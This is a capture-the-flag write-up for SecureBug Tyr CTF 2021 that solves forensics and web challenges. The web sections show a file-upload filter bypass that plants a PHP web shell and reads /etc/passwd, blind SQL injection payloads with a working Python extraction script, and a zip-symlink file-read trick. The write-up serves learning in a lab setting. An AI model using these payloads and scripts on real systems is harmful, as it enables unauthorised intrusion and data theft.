SecureBug Tyr CTF 2021 Write-up

Misplaced

Forensics – 50pts

Description

What is this file?!

Solution

Here we get a file called file.what. When we run file file.what all we get is that it contains data. Lets see what binwalk can find.

 DECIMAL       HEXADECIMAL     DESCRIPTION
 1048576       0x100000        Zip archive data, encrypted at least v2.0 to extract, compressed size: 282364, uncompressed size: 287052, name: Article1.jpg
 1331114       0x144FAA        End of Zip archive, footer length: 64, comment: "Password: 3a24869a641d60c09ceb71af4f99cffc"

Looks like we got a password protected zip file and even the password. When we unzip the extracted zip file using the password in the comment we get the file Article1.jpg, but we can’t view the image.

Executing file Article1.jpg we find out that it’s a MS Word file. Opening the file in a Word-viewer we get a document which contains the flag.

SBCTF{n1c3_c4rv1n6_w3ll_d0n3}

Nice Duck!

Forensics – 100pts

Description

Do you want to see a nice duck?

Solution

For this challenge we get a pcap, opening the capture file in Wireshark we can see some HTTP traffic. Opening the ‘Export objects -> HTTP’ window we can see the following objects.

Saving the file movie.mp4 and watching it gives us the flag after a couple of seconds.

SBCTF{1n53cur3_commun1c471on}

Flag Script

Web – 50pts

Description

This website looks familiar, but does it even flag?

Solution

Taking a look at the challenge page we get a matrix-like animation.

When we take a look at the source of the page we can see a script called flagscript.js is loaded.

http://flagscript.js

Opening the source for the script shows us an obfuscated script. When cleaning the script up a bit we find the following code.

var fontSize = 0xa,
  columns = canvasObject[getArrValue(0x172)] / fontSize,
  drops = [],
  a = "S",
  xx = "_",
  ab = "}",
  c = "C",
  d = "T",
  e = "F",
  f = "{",
  g = "n",
  r = "c",
  bg = "0",
  fv = "B",
  i = "t",
  j = "_",
  k = "a",
  m = "n",
  n = "i",
  o = "c",
  u = "e",
  jj = "e",
  q = "_",
  s = "o",
  kk = "d",
  flag = a[getArrValue(0x16f)](
    fv, c, d, e, f, g, bg, i, j, k, xx, m, n, o, jj, q, r, s, kk, u, ab
  );

So all we need to do is enter flag in the console and we get the flag.

SBCTF{n0t_a_nice_code}

Trojan Horse

Web – 100pts

Description

There is an Art Gallery that is taking submissions online due to the pandemic, we need you to find the password of the administrator account. btw, I heard that their security system has a flaw in it and stores passwords in plaintext.

Solution

When entering the challenge page we get an upload form.

Trying to upload different files reveals that the only files accepted are different types of images. Trying to upload a PHP file gives us an error message.

By changing the request to include a .png extension and the content type image/png we are able to upload a PHP-shell.

Content-Disposition: form-data; name="image"; filename="php-backdoor.png.php"
Content-Type: image/png

When we send the altered request we get the following response.

<pre>Your Artwork was uploaded! at <a href='uploads/88c18fcbf6231d7c4d4940bea6d11c85.php'>uploads/88c18fcbf6231d7c4d4940bea6d11c85.php</a></pre>

Now we can use the shell to poke around, and in the /etc/passwd file we find the flag at the last line.

administrator:SBCTF{unr3s7r1c73d_f1l3_upl04d_1s_d4ng3r0us}:1000:1000:administrator,,,:/home/administrator:/bin/bash

SBCTF{unr3s7r1c73d_f1l3_upl04d_1s_d4ng3r0us}

Blind Flagger

Web – 200pts

Description

Everything is under the table, the flag table!

Solution

Here we have a administrator login page.

None of the two parameters seem to be vulnerable to SQL injection, we only get the message you FAlid to 3nt3r. Taking a look at the source we can find a comment.

<!--"/old-login" if this didn't work -->

Sending a POST request to /old-login with uname=Admin&psw=' OR 1=1;-- returns You did it!!. And sending uname=Admin&psw=' OR 1=2;-- returns the you FAlid to 3nt3r message.

Now we need to find out what SQL-server is being used. When we try uname=Admin&psw=' OR last_insert_rowid()=last_insert_rowid();-- we get the You did it!! message, so we are dealing with an SQLite database. Now we can enumerate the tables.

When using the request uname=Admin&psw=' OR (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name like '%') > 0;-- as the base for the enumeration we find the table flag.

Now we need to find the column names in the table flag. Using the request uname=Admin&psw=' OR (SELECT sql FROM sqlite_master WHERE type='table' and sql like 'CREATE TABLE flag (%') > 0;-- as the base, we find out that there’s one column named flaggedflag in the table flag.

To dump the data in the table we can use the following python script.

#!/usr/bin/env python3

import requests
import string

data = ''
idx = 1

while True:
    for char in string.printable:
        postData = {'uname': 'Admin', 'psw': "' OR (SELECT hex(substr(flaggedflag,"+str(idx)+",1)) FROM flag limit 1 offset 0) = hex('" + char + "');--"}
        r = requests.post('http://18.194.166.81:3334/old-login', postData)
        if "You did it!!" in r.text:
            data += char
            print(data)
            break
    idx += 1

Running this we get the flag.

SBCTF{Y0u-h@v3-G0t-th3-Fl@g}

Upgrade

Web – 200pts

Description

File Upload , sensitive data exposure using zip symlinks file

Solution

For this challenge we get an upload form, and as the description suggests, we should upload a zip file containing a symlink.

There’s also an robots.txt file that gives us some extra hints about the whereabouts of the flag.

User-agent: *
Disallow: /uploads
Disallow: /home/flag

If we create a zip file containing a symlink pointing to /home/flag we get an error telling us that the file failed to upload. As it turns out, the zip file has to be named upload.zip and the zipped file has to be named source.

When we create the upload.zip file with zip --symlinks -r upload.zip source and upload it we get the flag.

FLAG{zIp_aNd_sYmLinkS_arE_S0_rIskY}